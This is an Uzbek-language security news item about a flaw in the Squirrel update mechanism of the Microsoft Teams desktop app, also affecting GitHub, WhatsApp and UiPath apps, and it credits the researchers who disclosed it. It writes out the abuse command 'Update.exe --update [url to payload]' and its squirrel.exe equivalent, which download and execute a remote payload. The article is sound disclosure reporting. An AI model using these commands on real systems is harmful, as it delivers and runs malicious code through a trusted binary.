Microsoft Teams zararli fayllarni yuklab olish va ishga tushirish imkonini beradi
Zaiflik Microsoft Teams ish stoli dasturiy ta’minotining kelgusi versiyalarida tuzatiladi.
Microsoft Teams ish stoli ilovasida yangilanish mexanizmining joriy tatbiq etilishi ixtiyoriy fayllarni yuklab olish va bajarish imkonini beradi. Muammo GitHub, WhatsApp va UiPath’dan ish stoli ilovalariga ham ta’sir qiladi, lekin faqat foydali yuklarni yuklab olishga ruxsat beradi. O’rnatish va yangilash jarayonlarini boshqarish uchun ushbu ilovalar ochiq kodli Squirrel loyihasiga tayanadi, bu esa o’z navbatida kerakli fayllarni yuklab olish uchun NuGet paket menejeridan foydalanadi. Xavfsizlik bo’yicha tadqiqotchilar zaif ilovalardagi «yangilash» buyrug’i joriy foydalanuvchi kontekstida kodni yuklab olish va bajarish uchun ishlatilishi mumkinligini aniqladilar. Xuddi shu narsa «squirrel.exe» uchun ham amal qiladi.
Microsoft Teams uchun foydali yuk dastur papkasiga qo’shiladi va Update.exe –update [url to payload] yoki squirrel.exe –update [url to payload] buyruqlari yordamida avtomatik ravishda bajariladi. Ushbu buyruqlar boshqa argumentlar, jumladan, NuGet paketi sifatida masofaviy foydali yukni olish imkonini beruvchi «yuklab olish» bilan ishlatilishi mumkin. Ushbu usul Microsoft Teams o’rnatish paketining bir qismi bo’lgan «squirrel.exe» uchun ham ishlaydi.
Xavfsizlik bo’yicha tadqiqotchi Reegun Richard shu yilning 4 iyunida Microsoft kompaniyasini muammo haqida xabardor qildi. Hozirda Microsoft Teams ish stoli ilovasi zaifligicha qolmoqda, chunki tuzatish faqat keyingi versiyalarda chiqariladi. Richard yamoq chiqquncha muammo tafsilotlarini oshkor qilmaydi. Biroq, RingZer0 Team tadqiqotchisi janob Un1k0d3r taxallusi bilan ham muammoni aniqladi va tafsilotlarni e’lon qildi.
